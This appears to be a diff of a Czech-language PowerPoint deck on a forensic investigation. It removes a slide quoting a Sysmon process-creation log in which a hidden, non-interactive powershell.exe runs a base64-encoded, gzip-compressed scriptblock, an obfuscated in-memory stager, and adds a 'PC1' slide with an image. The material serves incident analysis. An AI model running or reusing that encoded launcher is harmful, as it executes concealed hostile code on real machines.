@@ -10075,492 +11256,10 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="8" name="Obdélník 7">
+          <p:cNvPr id="2" name="Nadpis 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C82994BB-411B-4118-B7FA-A89CAA13C009}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="1580769" y="982176"/>
-            <a:ext cx="10515600" cy="4893647"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>"Process Create:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>RuleName</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>: </a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>UtcTime</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>: 2019-03-26 21:14:44.276</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>Image: C:\Windows\System32\conhost.exe</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>FileVersion</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>: 10.0.17134.1 (WinBuild.160101.0800)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>Description: Console Window Host</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>Product: Microsoft? Windows? Operating System</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>Company: Microsoft Corporation</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>CommandLine</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>: \??\C:\WINDOWS\system32\</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>conhost.exe 0xffffffff -ForceV1</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>CurrentDirectory</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>: C:\WINDOWS</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>User: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>PC2\user</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>IntegrityLevel</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>: High</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>Hashes: SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>ParentImage</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>ParentCommandLine</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>: ""</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>powershell.exe</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>"" -noni -</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>nop</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t> -w </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>hidden</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t> -c &amp;([</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>scriptblock</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>]::create((New-Object </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>IO.StreamReader</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>(New-Object </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>IO.Compression.GzipStream</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>((New-Object </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>IO.MemoryStream</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>(,[Convert]::FromBase64String('H4sIAFuWmlwCA7VW/W+iSBj+uU36P5CNiZBaRWu7vSabHCAornRlUbR65kJhhFkHcGGo4t7+7/eOQLebbe92LzlCwny8n8/7zLyss8ilOI44/5r7cnZ6MnYSJ+T42mZ+3eBqIRZOTmC1Fut2yr3j+KW03fbi0MHR6vZWyZIERbSYN/uISmmKwgeCUcoL3F/cLEAJuvjw8Am5lPvC1f5s9kn84JBSLFccN0DchRR5bG8Uuw6LpGltCaZ8/+VTc79RPrZ2Kh7tN+/aUbV0e7uAIOHA7m6aIxT5NGiI+0tRhN4i7rsi5PjzaSnxNufBUIN1pgKWwjA5GhbY+a2lgTf/P8Eq74wAPt6/gvVt7R92fwpAsVEm/MP69wu/BOgvpj5zMAU5C649gorW+woCJTOe/Z2wskDl1+XDfi8/ZPTiDn5azk7/</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>BrreYUTFCgAA</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>'))),[</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>IO.Compression.CompressionMode</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>]::Decompress))).</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>ReadToEnd</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>()))";"1";"5";;"4";"1";"0";"-9223372036854775808";"589779";"Microsoft-Windows-Sysmon";"5770385f-c22a-43e0-bf4c-06f5698ffbd9";"Microsoft-Windows-Sysmon/Operational";"2236";"2264";"PC2";"S-1-5-18";"26.03.2019 22:14:44";;;"Microsoft-Windows-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>Sysmon</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>/Operational";"System.UInt32[]";"System.Diagnostics.Eventing.Reader.EventBookmark";"Information";"Info";"Process Create (rule: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>ProcessCreate</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>)";"System.Collections.ObjectModel.ReadOnlyCollection`1[</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>System.String</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>]";"System.Collections.Generic.List`1[</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>System.Diagnostics.Eventing.Reader.EventProperty</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>]"</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="11" name="Nadpis 10">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F13FAC93-3D71-450F-A35B-84C6B766BAAD}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C364312D-5199-4C2F-BDAA-1BC7D0C31194}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -10573,27 +11272,63 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="0" y="142301"/>
-            <a:ext cx="12192000" cy="585926"/>
+            <a:off x="76135" y="64009"/>
+            <a:ext cx="12039665" cy="438912"/>
           </a:xfrm>
         </p:spPr>
         <p:txBody>
           <a:bodyPr>
-            <a:noAutofit/>
+            <a:normAutofit fontScale="90000"/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
             <a:r>
-              <a:rPr lang="en-US" sz="5400" dirty="0"/>
-              <a:t>POWERSHELL PROCESS</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>PC1</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="4" name="Obrázek 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F87AAFEF-7B3C-45BE-9C82-638E02B6E22C}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId2">
+            <a:extLst>
+              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+              </a:ext>
+            </a:extLst>
+          </a:blip>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1972387" y="541247"/>
+            <a:ext cx="10143413" cy="5775506"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="704521522"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="148594441"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -10622,160 +11357,10 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="8" name="Obdélník 7">
+          <p:cNvPr id="2" name="Nadpis 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C82994BB-411B-4118-B7FA-A89CAA13C009}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="1498473" y="1736229"/>
-            <a:ext cx="10515600" cy="3385542"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>"File creation time changed:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
-              <a:t>RuleName</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>: </a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
